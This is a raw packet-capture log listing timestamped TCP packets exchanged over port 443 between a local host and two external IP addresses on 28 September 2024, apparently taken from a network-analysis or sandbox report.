                Sep 28, 2024 03:22:07.909118891 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909164906 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909184933 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909215927 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.909223080 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909245014 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.909296036 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.909435987 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909449100 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909495115 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.909501076 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909533978 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.909558058 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.909697056 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909709930 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909744024 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.909749031 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909806967 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.910196066 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.910209894 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.910253048 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.910258055 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.910293102 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.910321951 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.910382032 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.910418987 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.910435915 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.910439968 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.910490036 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.910608053 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.910623074 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.910681009 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.910686016 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.910725117 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.911001921 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.911015987 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.911082983 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.911088943 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.911129951 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.997544050 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.997575045 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.997653961 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.997673035 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.997711897 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.001648903 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035173893 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035187006 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035284042 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035300970 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035350084 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035350084 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035365105 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035397053 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035406113 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035439968 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035445929 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035489082 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035531998 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035648108 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035669088 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035746098 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035752058 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035795927 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035922050 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035934925 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.035975933 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.035979986 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036017895 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.036242008 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036254883 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036294937 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.036299944 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036330938 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.036354065 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.036510944 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036525011 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036593914 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.036600113 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036634922 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.036858082 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036871910 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036928892 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.036935091 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.036973953 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.036994934 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.087179899 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.087203026 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.087279081 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.087287903 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.087331057 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.125277042 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.125303984 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.125359058 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.125379086 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.125475883 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.125475883 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.125489950 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.125534058 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.125744104 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.125756979 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.125989914 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.125998020 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.126060963 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.126112938 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.126127005 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.126164913 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.126169920 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.126204014 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.126233101 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.166094065 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.166120052 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.166172028 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.166188002 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.166203022 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.166277885 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.166341066 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.166361094 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.166409969 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.166416883 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.166455984 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.175884962 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.175909996 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.175990105 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.176003933 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.176014900 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.176055908 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.215532064 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.215553999 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.215635061 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.215645075 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.215702057 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.215837002 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.215851068 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.215903997 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.215912104 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.215953112 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.216114044 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.216129065 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.216167927 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.216173887 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.216216087 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.216478109 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.216492891 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.216540098 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.216557980 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.216595888 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.216710091 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.216723919 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.216779947 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.216785908 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.216828108 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.254853010 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.254898071 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.254935980 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.254947901 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.254992008 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.255024910 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.255067110 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.255085945 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.255091906 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.255120039 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.255151033 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.264409065 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.264425039 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.264482975 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.264494896 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.264538050 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.264796972 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.264851093 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.264858007 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.264879942 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.264911890 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.264929056 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.269366026 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:08.269401073 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:08.554800987 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:08.554857969 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:08.554933071 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:08.562185049 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:08.562201977 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:08.604329109 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:08.604382038 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:08.604445934 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:08.609230042 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:08.609253883 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.293651104 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.293766022 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.293766975 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.324668884 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.324749947 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.329960108 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.329969883 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.330310106 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.330667973 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.331257105 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.355289936 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.355302095 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.355792999 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.355999947 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.357728958 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.375392914 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.403400898 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.727159023 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.727195024 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.727264881 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.727283955 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.727344036 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.753885984 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.753920078 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.753994942 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.754004002 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.754081964 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.879349947 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.879396915 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.879437923 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.879453897 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.879486084 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.879524946 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.880688906 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.880714893 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.880769968 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.880776882 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.880806923 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.880824089 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.907579899 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.907603979 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.907660961 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.907669067 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.907710075 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.907730103 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.909018993 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.909037113 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.909076929 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:09.909082890 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:09.909123898 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.001544952 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.001606941 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.001645088 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.001679897 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.001702070 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.001744032 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.003808022 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.003851891 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.003890038 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.003899097 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.003928900 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.003947973 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.030715942 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.030786991 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.030837059 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.030850887 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.030883074 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.030898094 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.069967985 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.069997072 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.070125103 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.070154905 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.071774960 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.123486996 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.123544931 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.123609066 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.123631954 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.123651028 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.123744965 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.124385118 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.124433994 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.124461889 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.124469995 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.124494076 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.124515057 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.126256943 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.126310110 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.126349926 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.126359940 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.126374006 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.126409054 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.153033972 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.153064013 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.153127909 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.153150082 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.153177023 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.153186083 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.156256914 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.156301022 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.156327963 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.156341076 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.156371117 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.156393051 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.165414095 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.165440083 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.165493965 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.165505886 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.165529966 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.165554047 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.192343950 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.192392111 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.192434072 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.192456961 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.192471981 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.193367958 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.246186972 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.246212006 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.246279001 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.246304035 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.246352911 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.246685028 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.246704102 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.246761084 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.246767998 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.246803999 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.248182058 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.248203039 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.248250961 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.248258114 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.248294115 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.248987913 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.249006987 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.249032974 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.249064922 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.249070883 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.249139071 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.274955988 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.274982929 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.275053978 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.275082111 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.275137901 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.276371002 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.276391029 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.276431084 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.276439905 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.276464939 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.276479006 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.313782930 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.313808918 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.313880920 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.313915968 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.314615011 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.314649105 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.314668894 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.314735889 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.314745903 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.314908028 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.337881088 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.337909937 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.338001966 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.338022947 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.338061094 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.381931067 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.381998062 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.382019043 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.382054090 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.382074118 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.382090092 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.382415056 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.382457972 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.382469893 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.382479906 CEST44349701194.67.193.12192.168.2.7
